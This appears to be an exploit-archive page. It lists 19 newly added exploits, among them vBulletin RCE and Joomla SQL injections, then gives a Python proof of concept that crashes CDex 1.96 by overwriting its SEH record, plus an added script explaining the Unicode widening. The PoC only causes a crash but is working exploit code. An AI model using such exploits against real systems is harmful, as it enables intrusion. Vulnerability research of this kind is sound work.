
19 changes to exploits/shellcodes

CDex 1.96 - Buffer Overflow
Zoom Linux Client 2.0.106600.0904 - Command Injection
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow
Firejail - Local Privilege Escalation
Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape
Linux kernel < 4.10.15 - Race Condition Privilege Escalation
Outlook for Android - Attachment Download Directory Traversal
Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)
GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution
Joomla! Component Guru Pro - SQL Injection
Joomla! Component Guru Pro - 'Itemid' SQL Injection
Joomla! Component User Bench 1.0 - 'userid' SQL Injection
Joomla! Component My Projects 2.0 - SQL Injection
vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution
vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion
Linksys WVBR0 - 'User-Agent' Remote Command Injection
Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection
Joomla! Component Guru Pro - 'promocode' SQL Injection
Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution
27 lines
No EOL
666 B
Python
Executable file
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96 - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage: http://cdex.mu/
# Version: v1.96
# Software Link: http://cdex.mu/?q=download
# Tested On: Windows 7 x32
#
#
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
#
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
#

# Output file whose contents are pasted into the "picture text" field.
file = "crash.txt"

# 520 filler characters, then 4 characters that overwrite the SEH record.
# The app is a Unicode build, so each character is widened to two bytes
# before the copy, which is why the 4 "B"s show up as 00420042.
crash = "A" * 520 + "B" * 4  # seh

# Write the crash string to disk; the context manager closes the file.
with open(file, "w") as writeFile:
    writeFile.write(crash)
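Added illustration, not part of bzyo's PoC: it models why the Unicode build turns the four "B"s into the 00420042 reported in the SEH record, and checks that the widened copy has the all-zero odd bytes behind the "no unicode ppr pointers" remark. It assumes the copy is a plain ASCII-to-UTF-16LE widening with no bytes inserted before the filler.

```python
import struct

# Constructed to mirror the PoC above: 520 filler characters followed by the
# 4 "B"s that the PoC expects to land in the SEH record.
FILLER = "A" * 520
SEH_TAG = "B" * 4


def build_crash() -> str:
    """Same string the PoC writes to crash.txt."""
    return FILLER + SEH_TAG


def widen(text: str) -> bytes:
    """Model what a Unicode build does to ASCII text it copies: each character
    becomes one UTF-16LE code unit, i.e. the ASCII byte followed by 0x00."""
    return text.encode("utf-16le")


def predicted_seh_record(text: str, filler_chars: int = len(FILLER)) -> int:
    """Return the 32-bit value the 'pointer to next SEH record' field receives
    once the widened copy overruns the stack. With 520 filler characters the
    record starts at byte 2 * 520 of the widened buffer (assumption: nothing
    is inserted ahead of the filler)."""
    wide = widen(text)
    start = 2 * filler_chars
    (dword,) = struct.unpack_from("<I", wide, start)
    return dword


def odd_bytes_are_zero(wide: bytes) -> bool:
    """True when every second byte is 0x00, the signature of a UTF-16LE copy of
    ASCII input. Only dwords of the form 0x00XX00YY can be produced this way,
    which is the constraint behind the author's 'no unicode ppr pointers'."""
    return all(b == 0 for b in wide[1::2])


if __name__ == "__main__":
    crash = build_crash()
    wide = widen(crash)
    print(f"{len(crash)} chars -> {len(wide)} bytes after widening")
    print(f"predicted next-SEH value: 0x{predicted_seh_record(crash):08x}")
    print("all odd bytes zero:", odd_bytes_are_zero(wide))
```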